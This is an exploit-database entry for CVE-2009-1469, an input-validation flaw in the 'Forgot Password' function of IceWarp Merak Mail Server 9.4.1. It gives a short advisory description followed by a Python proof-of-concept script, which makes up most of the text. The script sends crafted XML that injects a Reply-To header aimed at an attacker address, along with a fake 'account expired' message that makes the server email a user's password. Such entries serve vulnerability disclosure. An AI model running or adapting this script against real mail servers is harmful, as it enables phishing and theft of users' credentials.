IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation

Author: RedTeam Pentesting GmbH
type: webapps
platform: php
port: nan
date_added: 2009-05-05 
date_updated: 2014-04-23 
verified: 1 
codes: CVE-2009-1469;OSVDB-54229 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/34827/info

IceWarp Merak Mail Server is prone to an input-validation vulnerability because it uses client-supplied data when performing a 'Forgot Password' function.

Attackers can exploit this issue via social-engineering techniques to obtain valid users' login credentials; other attacks may also be possible.

#! /usr/bin/env python
import urllib2, sys

conf = {
 "captcha_uid": "5989688782215156001239966846169",
 "captcha": "4SJZ Z4GY",
 "forgot": "user@example.com",
 "replyto": "attacker@example.com",
 "server": "http://www.example.com/webmail/server/webmail.php"
}

data = """
<iq type="set">
 <query xmlns="webmail:iq:auth">
   <forgot>%(forgot)s</forgot>
   <captcha uid="%(captcha_uid)s">%(captcha)s</captcha>
   <subject>
     <![CDATA[
       Account expiration %EMAIL%\r\nReply-To: %(replyto)s\n
     ]]>
   </subject>
   <message>
     Dear %FULLNAME%,

     your account

     Username: %USERNAME%
     Password: %PASSWORD%

     has expired. To renew the account, please reply to this email
     leaving the email body intact, so we know the account is still
     used.

     Kind regards,

     the IT department
   </message>
 </query>
</iq>
""" % conf

req = urllib2.Request(conf['server'])
req.add_data(data)
res = urllib2.urlopen(req)
print repr(res.read())